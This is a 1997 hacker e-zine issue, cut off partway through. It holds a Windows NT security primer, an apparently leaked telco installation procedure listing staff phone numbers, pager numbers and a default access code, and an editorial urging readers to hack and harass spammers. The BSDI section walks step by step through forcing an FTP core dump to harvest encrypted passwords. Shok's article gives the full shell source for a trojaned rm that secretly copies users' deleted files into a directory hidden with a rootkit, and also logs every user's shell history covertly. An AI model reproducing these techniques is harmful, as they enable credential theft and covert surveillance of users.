ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³the havoc technical journal - http://www.thtj.com - ³± ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ± ±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±± vol. 2 no. 3 issue 15 ³ October 1, 1997 ³ a thtj communications publication ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ -³ the havoc technical journal issue 15 ³- ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Editorial..............................Scud-O Windows NT Security Education Guide....NeonSurge Single Access Serving System (SASS)....anonymous BSDI FTP CORE DUMPS....................Bronc Buster Security/Monitoring Tools..............Shok Cryptanalytic Attacks..................The Messiah Shadow files explained.................Shypht SMTP server scanner....................memor About The Internet Protocol............Malhavoc ShokDial - a linux war dialer..........Shok Under The Hood of Blowfish.............The Messiah Learning to Count All Over Again.......Bronc Buster scan.c.................................memor Vuls in Solaris 2.5.1..................Shok Operating Systems......................Fucking Hostile Hacking your way to DOS................Devix A phreak's dream come true.............Kode9 Rat Shak Shopping Made Easy............N-TREEG Telephone Conferencing.................DataThief How To Make A Cattleprod...............The Messiah Securing Linux.........................KiDMaGiC Social Insurance Numbers...............Devix Stupid Unix Pranks.....................The Darkling Oddville, THTJ.........................Scud-O The News...............................KungFuFox ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³ the NEW thtj.com ³ ³ ÄÄÄÄÄÄÄÄ ³ ³ coming soon from thtj communications ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Shouts go out to all my people on the block: The writers. You're the ones that make thtj run, and it is you that help to keep the community informed. We owe you. Other Shouts out go to: All of #phreak, #hackers, #hackphreak, #carparts, #linuxos, #phrack, (you all know who you are) ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ³the havoc technical journal - contacts³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ - Editor in Chief : Scud-O, scud@thtj.com - Assistant Editor : KungFuFox, mazer@cycat.com - Submissions Editor: Keystroke, keystroke@thepentagon.com - thtj email address: thtj@thtj.com - thtj website: http://www.thtj.com/ - thtj mailing address: PO BOX 448 Sykesville, MD 21784 The Havoc Technical Journal Vol. 2, No.3, October 1, 1997. A THTJ Communications publication. Contents Copyright (©) 1997 THTJ Communications. All Rights Reserved. No part of this publication may be reproduced in whole or in part without the expressed written consent of the Editor in Chief of The Havoc Technical Journal. [No copying THTJ, damnit.] The Havoc Technical Journal does in no way endorse the illicit use of computers, computer networks, and telecommunications networks, nor is it to be held liable for any adverse results of pursuing such activities. The articles provided in this magazine are without any expressed or implied warranties. While every effort has been taken to ensure the accuracy of the information contained in this article, the authors, editors, and contributors of this zine assume no responsibility for errors or omissions, or for damages resulting from the use of the information contained herein. For infomation about using articles published in THTJ, send mail to: e-mail: thtj@thtj.com ³ mail: THTJ PO Box 448 Sykesville, MD 21784 NOTICE: If you are an official of a government or an employee of a government, you must register with THTJ before reading any issue of this publication. A registration form will be mailed to you free of charge by using either of the mailing addresses above. Upon reception of this form you will be granted privelege to read all issues of The Havoc Technical Journal. Until you have registered, you are not authorized to read this or any issues of THTJ. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Editorial by Scud-O The NEW thtj. Well, with all great plans, the 'new thtj' that was scheduled for thtj14 is a month late, and here it is. I hope you enjoy it. I personally think that this is the best issue yet. This month as some of you know, I was fairly intoxicated, and seriously looked into giving up thtj. However, thanks to all of you out there, the staff of thtj communications, HBS, #phreak, the writers, and the editors, it all came together, and so, here is thtj15, bigger, badder, and kicking more ass. This issue also marks a change that you may or may not have noticed. thtj is now produced by thtj communications, inc. Havoc Bell Systems no longer publishes thtj, since it seems that so many of you thought that you had to be in HBS to write for thtj. This is entirely false. Anyone and everyone is free to write for thtj. HBS is not dying, but we will hopefully be able to focus more on group stuff, and less about thtj deadlines now that thtj isn't officially in our hands.. The redesigned thtj.com site is about to be coming at you, with a lot of new things that will hopefully make your life easier, and *gasp* more complete. thtj.com is finally going to have a majordomo or two up, have some e-mail forwarders for instant, easy access to current thtj issues, and article submission information. The www site is also going to improve. A bunch of you have said that the site is fairly lynx friendly, but it needs work. Less graphics and more content are on their way, as are some new cgis, wwwboards, and redesigned pages for distribution as well as submissions. Last, but certainly not least, will be the new main page. I am adding site links and info up top, so that all of you can skip over my rantings in the message of the day section. I am also hoping to make a forum for everyone to discuss their issues or problems with the community, so if you would like to contribute to that, get a hold of me. Finally this month, before I am done, I would like to talk with you about some things that need to be done, and somethings I would like to see on thtj.com. I have found various sources on the net for helping to block and protect your site and your sendmail from spammers using your site as a transfer site for their e-mail, to protect their servers from the flames. I am going to be adding some code for this, and other security info for you, since if you have a system up, you are just as curious about setting up system security as you are breaking it up. The reason I bring this all up is that spam is a serious problem. Retards like the 'spam king' (who recently had his servers disconnected) think that we all like having e-mail telling us about stupid products. The fact that we all know is that no one wants this shit. If you own your own domain you know about all this. You get hundreds of spam letters offering 'web registering services' and all the trash. We need to stop this, and we would, or could, but losers like the aformentioned 'spam king' using many servers to redirect their mail, and not let you know who the mail is from, so you cannot ask him to stop. Securing your site with the code I talked about is a step, but go beyond that. Spammers have ruined parts of the net, but not all of it. Take action, strike back, hack them, harrass them, spam them, make them learn to go fuck themselves. Well, thank you for the time it took you to read may rants. Scud-O , Founder, and Editor in Chief of THTJ ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Scud-O and HBS would like to hear your views on this commentary. Please feel free to e-mail us at: scud@thtj.com ---------------------------------------------- / ---/ --/ / / | /------/ / / /--- /-----/------/-----/ / / / /----------/ /--------/ -of HAVOC Bell Systems- scud@thtj.com ³ http://www.thtj.com ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ The Windows NT Security Education Guide (SEG) Part One by NeonSurge of Shatter (neonsurge@hotmail.com) NT Security components and subsystem The Logon Process WinLogon Users must log on to a Windows NT machine in order to use that NT based machine or network. The logon process itself cannot be bypassed, it is mandatory. Once the user has logged on, an access token is created (this token will be discussed in more detail later). This token contains user specific security information, such as: security identifier, group identifiers, user rights and permissions. The user, as well as all processes spawned by the user are identified to the system with this token. The first step in the WinLogon process is something we are all familiar with, CTRL+ALT+DEL. This is NT's default Security Attention Sequence (SAS - The SAS key combo can be changed. We will also discuss that later.). This SAS is a signal to the operating system that someone is trying to logon. After the SAS is triggered, all user mode applications pause until the security operation completes or is cancelled. (Note: The SAS is not just a logon operation, this same key combination can be used for logging on, logging off, changing a password or locking the workstation.) The pausing, or closing, of all user mode applications during SAS is a security feature that most people take for granted and dont understand. Due to this pausing of applications, logon related trojan viruses are stopped, keyloggers (programs that run in memory, keeping track of keystrokes, therefor recording someones password) are stopped as well. The user name is not case sensitive but the password is. After typing in your information and clicking OK (or pressing enter), the WinLogon process supplies the information to the security subsystem, which in turn compares the information to the Security Accounts Manager (SAM). If the information is compliant with the information in the SAM, an access token is created for the user. The WinLogon takes the access token and passes it onto the Win32 subsytem, which in turn starts the operating systems shell. The shell, as well as all other spawned processes will receive a token. This token is not only used for security, but also allows NTs auditing and logging features to track user usage and access of network resources. Note: All of the logon components are located in a file known as the Graphical Indetification and Authentication (GINA) module, specifically MSGINA.DLL. Under certain conditions, this file can be replaced, which is how you would change the SAS key combination. For fine tuning of the WinLogon process, you can refer to the registry. All of the options for the WinLogon process are contained in the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon area. You can also fine tune the process by using the Policy Editor. Logging on to a Domain If an NT machine is a participant on a Domain, you would not only need to login to the local machine, but the Domain as well. If a computer is a member of a Domain, the WinLogon process is replaced by the NetLogon process. Components Local Security Authority (LSA): Also known as the security subsystem, it is the central portion of NT security. It handles local security policies and user authentication. The LSA also handles generating and logging audit messages. Security Accounts Manager (SAM): The SAM handles user and group accounts, and provides user authentication for the LSA. Security Reference Monitor (SRM): The SRM is in charge of enforcing and assuring access validation and auditing for the LSA. It references user account information as the user attempts to access resources. TCP/IP Security in NT Note: This section is not meant to teach you the concepts behind the TCP/IP protocol. It is assumed that a working knowledge of TCP/IP can be applied. Windows NT has a built in TCP/IP security functionality that most people do not use or know about. This functionality enables you to control the types of network traffic that can reach your NT servers. Access can be allowed or denied based on specific TCP ports, UDP ports, and IP protocols. This type of security is normally applied to servers connected directly to the internet, which is not recommended. Do configure NT's built in TCP/IP security, follow these steps: 1 - Right click on Network Neighborhood and goto the properties option. 2 - Select the Protocols tab, highlight TCP/IP and click on Properties. 3 - Select the IP address tab of the TCP/IP properties screen. 4 - Check the check box that reads "Enable Security". 5 - Click on Configure You should now be looking at the TCP/IP Security dialog, which has the following options: -Adapter: Specifies which of the installed network adapter cards you are configuring -TCP Ports -UDP Ports -IP Protocols Within these settings, you would choose which ports and what access permissions you would like to assign to those ports. The following list is a list of the well known TCP/IP ports. This is not an in depth guide, just a quick reference (For more details, check RFC 1060). Service Port Comments TCP Ports echo 7/tcp discard 9/tcp sink null systat 11/tcp users daytime 13/tcp netstat 15/tcp qotd 17/tcp quote chargen 19/tcp ttytst source ftp-data 20/tcp ftp 21/tcp telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver name 42/tcp nameserver whois 43/tcp nicname nameserver 53/tcp domain apts 57/tcp any private terminal service apfs 59/tcp any private file service rje 77/tcp netrjs finger 79/tcp http 80/tcp link 87/tcp ttylink supdup 95/tcp newacct 100/tcp [unauthorized use] hostnames 101/tcp hostname iso-tsap 102/tcp tsap x400 103/tcp x400-snd 104/tcp csnet-ns 105/tcp CSNET Name Service pop-2 109/tcp pop postoffice sunrpc 111/tcp auth 113/tcp authentication sftp 115/tcp uucp-path 117/tcp nntp 119/tcp usenet readnews untp ntp 123/tcp network time protocol statsrv 133/tcp profile 136/tcp NeWS 144/tcp news print-srv 170/tcp exec 512/tcp remote process execution; authentication performed using passwords and UNIX loppgin names login 513/tcp remote login a la telnet; automatic authentication performed based on priviledged port numbers and distributed data bases which identify "authentication domains" cmd 514/tcp like exec, but automatic authentication is performed as for login server printer 515/tcp spooler efs 520/tcp extended file name server tempo 526/tcp newdate courier 530/tcp rpc conference 531/tcp chat netnews 532/tcp readnews uucp 540/tcp uucpd klogin 543/tcp kshell 544/tcp krcmd dsf 555/tcp remotefs 556/tcp rfs server chshell 562/tcp chcmd meter 570/tcp demon pcserver 600/tcp Sun IPC server nqs 607/tcp nqs mdqs 666/tcp rfile 750/tcp pump 751/tcp qrh 752/tcp rrh 753/tcp tell 754/tcp send nlogin 758/tcp con 759/tcp ns 760/tcp rxe 761/tcp quotad 762/tcp cycleserv 763/tcp omserv 764/tcp webster 765/tcp phonebook 767/tcp phone vid 769/tcp rtip 771/tcp cycleserv2 772/tcp submit 773/tcp rpasswd 774/tcp entomb 775/tcp wpages 776/tcp wpgs 780/tcp mdbs 800/tcp device 801/tcp maitrd 997/tcp busboy 998/tcp garcon 999/tcp blackjack 1025/tcp network blackjack bbn-mmc 1347/tcp multi media conferencing bbn-mmx 1348/tcp multi media conferencing orasrv 1525/tcp oracle ingreslock 1524/tcp issd 1600/tcp nkd 1650/tcp dc 2001/tcp mailbox 2004/tcp berknet 2005/tcp invokator 2006/tcp dectalk 2007/tcp conf 2008/tcp news 2009/tcp search 2010/tcp raid-cc 2011/tcp raid ttyinfo 2012/tcp raid-am 2013/tcp troff 2014/tcp cypress 2015/tcp cypress-stat 2017/tcp terminaldb 2018/tcp whosockami 2019/tcp servexec 2021/tcp down 2022/tcp ellpack 2025/tcp shadowserver 2027/tcp submitserver 2028/tcp device2 2030/tcp blackboard 2032/tcp glogger 2033/tcp scoremgr 2034/tcp imsldoc 2035/tcp objectmanager 2038/tcp lam 2040/tcp interbase 2041/tcp isis 2042/tcp rimsl 2044/tcp dls 2047/tcp dls-monitor 2048/tcp shilp 2049/tcp NSWS 3049/tcp rfa 4672/tcp remote file access server complexmain 5000/tcp complexlink 5001/tcp padl2sim 5236/tcp man 9535/tcp UDP Ports echo 7/udp discard 9/udp sink null systat 11/udp users daytime 13/udp netstat 15/udp qotd 17/udp quote chargen 19/udp ttytst source time 37/udp timserver rlp 39/udp resource name 42/udp nameserver whois 43/udp nicname nameserver 53/udp domain bootps 67/udp bootp bootpc 68/udp tftp 69/udp sunrpc 111/udp erpc 121/udp ntp 123/udp statsrv 133/udp profile 136/udp snmp 161/udp snmp-trap 162/udp at-rtmp 201/udp at-nbp 202/udp at-3 203/udp at-echo 204/udp at-5 205/udp at-zis 206/udp at-7 207/udp at-8 208/udp biff 512/udp used by mail system to notify users of new mail received; currently receives messages only from processes on the same machine who 513/udp maintains data bases showing who's logged in to machines on a local net and the load average of the machine syslog 514/udp talk 517/udp like tenex link, but across machine - unfortunately, doesn't use link protocol (this is actually just a rendezvous port from which a tcp connection is established) ntalk 518/udp utime 519/udp unixtime router 520/udp local routing process (on site); uses variant of Xerox NS routing information protocol timed 525/udp timeserver netwall 533/udp for emergency broadcasts new-rwho 550/udp new-who rmonitor 560/udp rmonitord monitor 561/udp meter 571/udp udemon elcsd 704/udp errlog copy/server daemon loadav 750/udp vid 769/udp cadlock 770/udp notify 773/udp acmaint_dbd 774/udp acmaint_trnsd 775/udp wpages 776/udp puparp 998/udp applix 999/udp Applix ac puprouter 999/udp cadlock 1000/udp hermes 1248/udp wizard 2001/udp curry globe 2002/udp emce 2004/udp CCWS mm conf oracle 2005/udp raid-cc 2006/udp raid raid-am 2007/udp terminaldb 2008/udp whosockami 2009/udp pipe_server 2010/udp servserv 2011/udp raid-ac 2012/udp raid-cd 2013/udp raid-sf 2014/udp raid-cs 2015/udp bootserver 2016/udp bootclient 2017/udp rellpack 2018/udp about 2019/udp xinupagesrver 2020/udp xinuexpnsion1 2021/udp xinuexpnsion2 2022/udp xinuexpnsion3 2023/udp xinuexpnsion4 2024/udp xribs 2025/udp scrabble 2026/udp isis 2042/udp isis-bcast 2043/udp rimsl 2044/udp cdfunc 2045/udp sdfunc 2046/udp dls 2047/udp shilp 2049/udp rmontor_scure 5145/udp xdsxdm 6558/udp isode-dua 17007/udp The Nbtstat Command This tool should be known, because it can give you tons of info about an NT server. It can be used to query the network concerning netbios information. It can also be useful for purging the netbios cache and reloading the LMHOSTS file. This one command can be extremely useful when performing security audits. When one knows how to interpret the information, it can reveal more than one might think. Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval] Switches -a Lists the remote computer's name table given its host name. -A Lists the remote computer's name table given its IP address. -c Lists the remote name cache including the IP addresses. Lists the remote name cache including the IP addresses Lists local NetBIOS names. Lists names resolved by broadcast and via WINS Purges and reloads the remote cache name table Lists sessions table with the destination IP addresses. Lists sessions table converting destination IP addresses to host names via the hosts file. -n Lists local NetBIOS names. -r Lists names resolved by broadcast and via WINS. -R Purges and reloads the remote cache name table. -S Lists sessions table with the destination IP addresses. -s Lists sessions table converting destination IP addresses to host names via the hosts file. interval This will redisplay the selected statistics, pausing for the number of seconds you choose as "interval" between each listing. Press CTRL+C to stop. Notes on NBTSTAT The column headings generated by NBTSTAT have the following meanings: Input Number of bytes received. Output Number of bytes sent. In/Out Whether the connection is from the computer (outbound) or from another system to the local computer (inbound). Life The remaining time that a name table cache entry will "live" before your computer purges it. Local Name The local NetBIOS name given to the connection. Remote Host The name or IP address of the remote host. Type A name can have one of two types: unique or group. The last byte of the 16 character NetBIOS name often means something because the same name can be present multiple times on the same computer. This shows the last byte of the name converted into hex. State Your NetBIOS connections will be shown in one of the following "states": State Meaning Accepting An incoming connection is in process. Associated The endpoint for a connection has been created and your computer has ssociated it with an IP address. Connected This is a good state! It means you're connected to the remote resource. Connecting Your session is trying to resolve the name-to-IP address mapping of the destination resource. Disconnected Your computer requested a disconnect, and it is waiting for the remote computer to do so. Disconnecting Your connection is ending. Idle The remote computer has been opened in the current session, but is currently not accepting connections. Inbound An inbound session is trying to connect. Listening The remote computer is available. Outbound Your session is creating the TCP connection. Reconnecting If your connection failed on the first attempt, it will display this state as it tries to reconnect. 16th Byte character Values for NetBios names <00> Workstation service name <03> Messenger service name <1B> Domain Master Browser name <06> RAS Server service <1F> NetDDE service <20> Server service name <21> RAS Client Network monitor agent Network monitor utility <1C> Domain group name <1D> Master browser name <1E> Normal group name _MSBROWSE_ Domain master browser The messenger service name <03> will give you the name of any users currently logged onto that machine, including the administrator account name. Thats about it for part one. Look out for future releases. Question or Comments to NeonSurge@hotmail.com ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Single Access Serving System (SASS) (anonymous) PROCESS DOCUMENTATION Santa Ana, April 8, 1997 SUBJECT Single Access Serving System (SASS). REASON FOR ISSUANCE This document will provide an EM Communication Technician with installation procedures for the Single Access Serving System (SASS) SWITCH TYPES AFFECTED 5ESS, DMS100 and 1AESS GENERIC/BCS REQUIRED None WORK FUNCTIONS AFFECTED Local Field Operations (LFO) EM Communication Technicians EFFECTIVE / CRITICAL DATES Effective immediately. TRACKING CODE Baseline QUESTIONS Questions regarding this document may be directed to Michele Baker at (714) 430-6640 GENERAL INFORMATION SASS is a transmission conditioning unit, a printed wiring card that employs a microprocessor control of test functions and provides voice prompting. The card is installed in an MFT bay and connected to the switch through an outgoing trunk. A dedicated POTS line is required for the ringback feature. This Single Serving Access System will allow both outside field technicians as well as LFO technicians the ability to perform multiple test functions using one access number. The Unit Test Features are: - ANI - Single Tone Generation - Three Tone slope - Ten Tone Slope - Full Tone Sweep - Caller ID Transmission - Data Sweep - Quiet Termination - Keypad Test CENTRAL OFFICE (CO) REQUIREMENTS 1. An MFT slot 2. An outgoing trunk OR A D4 port equipped with a DPT Channel Unit. 3. A new Trunk Group assignment will be established 4. The SASS Access Number wil need to be route indexed to the trunk or port assigned. 5. Assignment and cross connect to a POTS line for ringback capabilities. CENTRAL OFFICE (CO) PROCESS (1) Wiring the Circuit 1. You will receive two service orders for your SASS circuit. One for the design itself (se word) and one for the POTS line (1ML) associated with it. The POTS order will consist of only an OE assignment used for ringback capabilities. NOTE 1) The design portion of your order will resemble a DID circuit. NOTE 2) Every effort will be made to use a digital trunk assignment, however, if none are available, an analog trunk will be used in its place. NOTE 3) Make sure the channel unit used in the circuit is a D4CD200 (terminating). CENTRAL OFFICE (CO) PROCESS (2) Installing and Optioning The Channel Unit Install the SASS Unit into the designated MFT slot. Once the plug-in has been installed it should be optioned according to the manufacturers instructions on the card. CENTRAL OFFICE (CO) PROCESS (3) Initial Power-Up Verification Once the SASS unit is installed and optioned the Initial Power-up verification must be performed at the unit itself. CENTRAL OFFICE (CO) PROCESS (4) Procedure for Setting Transmission Levels Once the SASS unit has passed the Initial Power-up verification the Transmission Levels must be set for the unit. The following is the procedure for setting transmission levels on a newly installed SASS Unit. This function must be performed at the mainframe to any pair assigned to an OE in the respective switch in which the SASS unit was installed. The pair must be open and the reading taken toward the line card. STEP ACTION 1 At the mainframe, remove the coils from any working pair assigned to an OE in the respective switch. 2 Draw dial tone on the OE side of the open and dial the SASS access number. 3 Enter the SASS Security Code after the number announcement. The default Security Code is 222-2222. 4 Press 3 to Read or Change Prefixes 5 Press 5 to Generate Test Tone. 6 Enter * to Generate System Tone 7 Measure Tone with a transmission measurement test set. Should measure a level of 0dbBRNC. NOTE 1) Adjustments may be made by; entering a 6 to increase level by 0.1 dB each time the 6 is depressed, or entering 7 to decrease the level by 0.1 dB each time the 7 is depressed. 8 When you have completed setting the db levels, hangup to terminate the call. 9 A test must be performed on least three (3) prefixes to determine whether the db levels were set correctly in all prefixes.. A deviation of + or -1/2 db is acceptable. If tests reveal any variance greater than + or -1/2 db, you must repeat the procedure for Setting Tranmission Levels for every prefix. CENTRAL OFFICE (CO) PROCESS (5) Testing The Newly Installed SASS Unit When the SASS installation is complete, call the Test System Health Group to test the newly installed unit. They will in turn close the order out with OCS. CENTRAL OFFICE (CO) PROCESS (6) Troubleshooting A Newly Installed SASS Unit When the SASS installation is complete, the Initial Power-up verification has been performed, the transmission levels have been set and your circuit is still not turned up, try the following troubleshooting procedures. CENTRAL OFFICE (CO) PROCESS (7) Who To Call When You Have Questons Concerning: Closing out your order Test System Health Group SASS Project SASS Project Team Word order asignments FACS Administrator Spares PICS Test coordination Test System Health Group Translations NTG This document PP&STM Trunk Assignments NTG CONTACT NUMBERS NTG - South Trouble Desk (619) 886-1988 - North Trouble Desk (916) xxx-xxxx PADS - South (619) 886-1988 - North (916) xxx-xxxx PICS - (not provided) Process, Product & System Technical Management (PP&STM) - Michele Baker Voice/Voice mail (714) 430-6640 Pager Number (714) 755-8424 Test System Health Group - (Statewide) Voice (800) 694-4732 SASS Project Team - Bruce Poole Voice/Voice mail (209) 454-3197 Pager Number (510) 904-7574 REFERENCES Harris Dracon Division Single Access Serving System (SASS) Transmission Condititoning Unit Model 24800-300 Service Manual 011-724800-300 (Issue 3 2/94) Harris (Addendum) Dracon Division SASS Transmission Condititoning Unit Model 24800-300 Service Manual 011-724209-001 (Issue 5 6/96) Questions? At what point will I know that translations are typed in. At what point does the ntec ask the ess to idle trunk? Before setting levels. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ BSDI FTP CORE DUMPS by Bronc Buster (www.showdown.org) (bbuster@succeed.net) It was over a year ago that I first reported my findings to BugTraqs, BSDI, and CERT about the potential security holes with BSDs core dumping problems. On the day of 3 Sept 97 BSDI finaly released a patch for this hole, but as most of you know, most SysAdmins don't keep track of patchs and their release dates because everyone alawys thinks they are immune to attack. This hole uses the massive built in feature on BSD systems that they use to make their Unix version more stable and less prevy to crashing, Core Dumps. By useing this function to force a core dump after accessing the password file you will be able to retreve encrypted passwords from the core dump. This only works on BSDI BSD/OS 2.X and NOT BSD 3.X. How it works: you FTP in as a legit user, then stop the process and then kill it forcing a core dump. By forcing the dump after the FTP program (wu ftpd 2.4 used) has accessed the password file it will dump the stack and all the information in it to a core dump file owned by that user in the present working directory. I think the commands for this exploit are very easy to understand and are self explaintory. main: {1} % ftp succeed.net // FTP to localhost Connected to succeed.net. 220 main.succeed.net FTP server (Version wu-2.4(2) Tue Jan 7 08:37:31 EST 1997) ready. Name (succeed.net:bbuster): bbuster // Login as a user 331 Password required for bbuster. Password: 230 User bbuster logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> ^Z // Control Z and suspend it Suspended main: {2} % ps // Find PID number of FTP PID TT STAT TIME COMMAND 23875 p2 Is 0:00.13 -csh (csh) 23967 p2 S+ 0:00.03 telnet localhost 23969 p3 Ss 0:00.10 -csh (csh) 23978 p3 T 0:00.02 ftp succeed.net 23989 p3 R+ 0:00.01 ps main: {3} % kill -11 23978 // Kill -11 the FTP process main: {4} % fg // Call FTP back to Foreground ftp succeed.net Segmentation fault (core dumped) // Dump the core main: {5} % strings ftp.core > test // Stings it to a file for reading main: {6} % cat test // Get the passwords That's it. This is not the only problem with BSDI BSD/OS systems and their core dumps, there was the well known write tty core dump which essentialy did the same thing as this exploit does, but it was patched much faster. Over all BDSI BSD/OS, all versions, are one of the most secure Unix systems on the market today and when an exploit is found for it we must treat it like gold as BSDI is usualy very fast is fixing them. Bronc Buster!!! [EOF] ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Security/Monitoring tools by Shok (shok@sekurity.org) Okay, well........welcome to this thing......by Shok. What I plan for this to be, is some various utilities that you might think as of use and what not. This is mainly a few security tips that I like to use. First off, edit your /etc/profile, and add the line: export HISTFILE=/tmp/hist/`whoami` and then do: mkdir /tmp/hist;chmud 1777 /tmp/hist You now want to hide that file, so the users don't see the dir (it can be seen with set but not too many people check :) and you hide it with the rootkit's ls. Another few things I like to do. I made a trojaned 'rm' that basically calls /bin/rm.bak which is hidden (via rootkit ls), and it copies the file they are trying to delete to /tmp/fill (which is also hidden via rootkit ls). There are two versions of this....I wrote the first one in shell script, but do to the fact it has to be a+r, I wrote it in C afterwords. Here is the rm.sh: #!/bin/sh # rm.sh -- rm "trojan" by (--==+*~Shok~*+==--) # # Email: shok@sekurity.org if [ $# > 1 ] then case $1 in -i) shift cp -f $* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -i $* ;; --interactive) shift cp -f $* /tmp/fill &>/dev/null doexec /bin/rm.bak rm -i $* ;; -f) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -f $* ;; --force) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -f $* ;; -d) shift cp $1/* /tmp/fill &>/dev/null /bin/rm.bak -d $* ;; --directory) shift cp $1/* /tmp/fill &>/dev/null /bin/rm.bak -d $* ;; -v) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -v $* ;; --verbose) shift cp -f $* /tmp/fill &>/dev/null /bin/rm.bak -v $* ;; -r) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -R $* ;; -R) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -R $* ;; --recursive) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -R $* ;; -ri) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -ri $* ;; -Ri) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -ri $* ;; -rf) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rf $* ;; -Rf) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rf $* ;; -rd) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -rd $* ;; -Rd) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -rd $* ;; -Rv) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -rv $* ;; -rv) shift cp -f $1/* /tmp/fill &>/dev/null /bin/rm.bak -rv $* ;; -fv) shift cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -fv $* ;; -Rfv) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rfv $* ;; -rfv) shift cp -f $1/* /tmp/fill &>/dev/null cp -f $1 /tmp/fill &>/dev/null /bin/rm.bak -rfv $* ;; *) cp -f $* /tmp/fill &>/dev/null /bin/rm.bak $* ;; esac else IT=$1 cp -f $IT /tmp/fill /bin/rm.bak $IT fi #---------------------------------------------------- You may have to change the line: doexec /bin/rm.bak -i $* to: /bin/rm.bak -i $* if you do not have doexec which is on linux (or redhat anyway) Now for rm.c: /* ------------------------------------------------------ */ /* rm.c -- rm "trojan" by (--==+*~Shok~*+==--) */ /* ------------------------------------------------------ */ /* Email: shok@sekurity.org */ #include #include #include #include #include void main(int argc, char 